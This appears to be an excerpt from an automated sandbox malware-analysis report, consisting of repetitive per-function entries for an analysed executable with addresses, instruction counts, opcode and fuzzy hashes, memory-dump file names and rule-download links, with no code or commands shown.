                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 7fcd4e0e66000d7c89cce3d798c147d744c637bd076a4f17c0608046c6fe111c
                                                                                                                                                                                                                                                                  • Instruction ID: e895c9fc908b18a25e08ec982dfcd823fc5ac0ccc98ec6d0067849733d197a6e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7fcd4e0e66000d7c89cce3d798c147d744c637bd076a4f17c0608046c6fe111c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1EE1BBB06006058FEB24CF68C190AEFBBB2FF49714B248A4DD4969B391D731AD86CB55
                                                                                                                                                                                                                                                                  Function 006B05BD Relevance: 1.6, Strings: 1, Instructions: 388COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 54a6f3ac149c63b179cd1198fd8b3f65597ccb6cdee5e7a688825deba8ff928f
                                                                                                                                                                                                                                                                  • Instruction ID: d34ae8c88c6eb43e3e5428178ffad34e2ad1a3c50e31706e83aec832102a2eb6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54a6f3ac149c63b179cd1198fd8b3f65597ccb6cdee5e7a688825deba8ff928f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACE19CB4A006058FEB24DF68C590AEBBBF2FF49310F24965DD4569B392D730AD82CB51
                                                                                                                                                                                                                                                                  Function 006B1022 Relevance: 1.6, Strings: 1, Instructions: 388COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 3cc1b6b788d65978f59a434d8b357a5e5ac0c58e81d3987aac4a9288cea2ce52
                                                                                                                                                                                                                                                                  • Instruction ID: 3f914d36ad418b308a590683028e35edb2d9f51013b47e11695ee78b6e24b67a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3cc1b6b788d65978f59a434d8b357a5e5ac0c58e81d3987aac4a9288cea2ce52
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDE1AAB0A00605AFCB24DF68C5A0AEAB7F3AF46310FA4861DD5569F391D730ADC2CB55
                                                                                                                                                                                                                                                                  Function 006AEFFB Relevance: 1.6, Strings: 1, Instructions: 348COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: b5f20149caf2266c41ad0c5a3b2434b142980e6555ce753f44629b375cb8144c
                                                                                                                                                                                                                                                                  • Instruction ID: 513863b5e9e72fe6a92a76d21828e6bcf04669db42e93f0b5b992bd9c6ffb5b4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5f20149caf2266c41ad0c5a3b2434b142980e6555ce753f44629b375cb8144c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8C1B074A006468FCB24EFE8C490ABEB7B3AF06314F24462DD45697392C771AD46CF92
                                                                                                                                                                                                                                                                  Function 006AEB8A Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 3f61c0a95e9a60c14b5b7e8faef6eb4b123162ea1b04d6a93cdd4481fb63f805
                                                                                                                                                                                                                                                                  • Instruction ID: aa65b32cdf06d1cec7290a4633afb75ca813dc09bde8a41d0031b868a16e7987
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f61c0a95e9a60c14b5b7e8faef6eb4b123162ea1b04d6a93cdd4481fb63f805
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08C1BE74A00A468FCB24EF28C584ABABBA3BF47314F24465DE45797391C732AD46CF91
                                                                                                                                                                                                                                                                  Function 006AF47F Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 2757e050080f33b728b8b5c25174ef0e94aaa0c0f22b9e835bf6a9324968aa54
                                                                                                                                                                                                                                                                  • Instruction ID: df08833a7841234513b9ea8eab11768df7e046c8490a50ed9d797469e7d80351
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2757e050080f33b728b8b5c25174ef0e94aaa0c0f22b9e835bf6a9324968aa54
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8C193709006468FCB64EFA8C4906AAB7E3EF17314F24466DD496973A2C731ED46CF52
                                                                                                                                                                                                                                                                  Function 006D5697 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006D56EB
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0068f7ec99dc46c3017c6f835f20fb48ca528ed0801720e96796bc0c9e38e4d9
                                                                                                                                                                                                                                                                  • Instruction ID: b0ac2c83dd95e141c1be227b9c847f6a8bd9627912af8f181d8e44a21daecc4d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0068f7ec99dc46c3017c6f835f20fb48ca528ed0801720e96796bc0c9e38e4d9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4821C272A00606EBDF289A24DC81EBA73AAEF54311F20007FF906C6741EB75ED058754
                                                                                                                                                                                                                                                                  Function 006AFD2E Relevance: 1.6, Strings: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: a41508205ec91a0efa82eeba8d8e859551922dd662066a5bceccdcc3807a3f94
                                                                                                                                                                                                                                                                  • Instruction ID: 86bc82d97443d2ebda446f0663ba95a46543caebaa6b088c2ef5cef4e7761af5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a41508205ec91a0efa82eeba8d8e859551922dd662066a5bceccdcc3807a3f94
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FB1BD70A0060A9ACB65FFA8C5906FEB7F3AF46300F10492DE456A7761D730AD46CF96
                                                                                                                                                                                                                                                                  Function 006B017F Relevance: 1.6, Strings: 1, Instructions: 322COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 227596aa48b5cf8b3671ac767d2c79ac7325d536b40da31a134dbdaaef61253c
                                                                                                                                                                                                                                                                  • Instruction ID: f2c6f750d618fc4cf02c74556df2d8dc09c03278c84d01870c01d444899ea0b0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 227596aa48b5cf8b3671ac767d2c79ac7325d536b40da31a134dbdaaef61253c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FBB1AFB0A0060A9FEB68CFA8C5946EFBBF3AF44304F10861DD556A7750D730AE86CB55
                                                                                                                                                                                                                                                                  Function 006AF8F0 Relevance: 1.6, Strings: 1, Instructions: 322COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: ec8b40b5fed45bcfeeaa47a85cac2be94c8d759873b50704dbdcd23464246a40
                                                                                                                                                                                                                                                                  • Instruction ID: 39456a31c3a7bf7a8f4dbce3ecbbe7ae96d30896f6895343b20121e09c03b84e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec8b40b5fed45bcfeeaa47a85cac2be94c8d759873b50704dbdcd23464246a40
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5B1B030A0060A9ACB64EFA8C5906FFB7F3AF46314F10492DD456A7390D730AD46CF96
                                                                                                                                                                                                                                                                  Function 006BB8A5 Relevance: 1.6, Instructions: 1571COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
